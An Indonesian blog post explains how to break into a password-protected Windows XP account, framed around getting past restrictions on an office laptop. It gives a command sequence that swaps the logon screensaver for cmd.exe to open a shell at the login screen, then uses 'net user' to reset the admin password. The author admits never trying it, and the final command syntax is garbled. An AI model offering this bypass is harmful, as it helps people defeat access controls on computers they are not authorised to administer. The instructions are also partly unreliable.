Share - Life - Techno

Lowongan Kerja Terbaru, Lowongan Kerja BUMN, Download Vector, Koran Gratis, Desain Grafis, Tips Blog, Tips IT, Artikel Pendidikan, Artikel Sejarah, Artikel Islam, Update Patch PES6, Dangdut Academy3

Cara Membobol Password Windows XP

Dear blogger, sempat kesal nggak bray, kalau kita pengen nginstal program baru/software atau kita pengen bikin sesuatu namun dibatasi, komputer yang kita pakai di proteksi dengan password. mengesalkan memang, termasuk laptop yang saya pakai dikantor.
Dengan sedikit usaha browsing nyari nyari tutorial ndelalah ketemu cara yang mungkin mudah, saya juga belum mraktekin, memang ada yang mudah dan ada yang sulit. Tutorial ini saya dapat dari http://internetbusinessdaily.net dan tekniknya sangat eksotis ala hacker, nggak usah pakai software bantuan apapun, nah ini caranya simak baik baik.

Pertama tama, masuk terlebih dahulu dengan akun windows yang penggunaanya serba dibatasi, kemudian masuk ke menu Command Prompt, cara singkatnya bisa dengan tombol shortcut Windows + R kemudian ketik CMD setelah masuk di Command Prompt ketik perintah dibawah ini secara berurutan.



cd\
cd\windows\system32
mkdir temphack
copy logon.scr temphack\logon.scr
copy cmd.exe temphack\cmd.exe
del logon.scr
rename cmd.exe logon.scr
exit

Jadi baris perintah yang tertera diatas itu adalah serangkaian perintah kepada windows, untuk mengubah username dan password yang diproteksi tersebut, nah menurut postingan yang saya baca tersebut, maka setelah baris perintah itu selesai diketik, kemudian kita restart maka dihalaman log in anda dapat langsung mengubah username dan password dengan cara berikut, ketika sudah tersedia tampilan maka segera ketikkan baris perintah dengan parenthesis (net user password), jadi jika nama user admin WAGIMAN kemudian Pasword 1234, maka itu artinya anda sudah mengubah password dengan user admin wagiman dengan password 1234, benarkah begitu? dicoba ya.
Cara Membobol Password Windows XP Rating: 4.5 Diposkan Oleh: Bhre Banyu Bening

0 comments:

Posting Komentar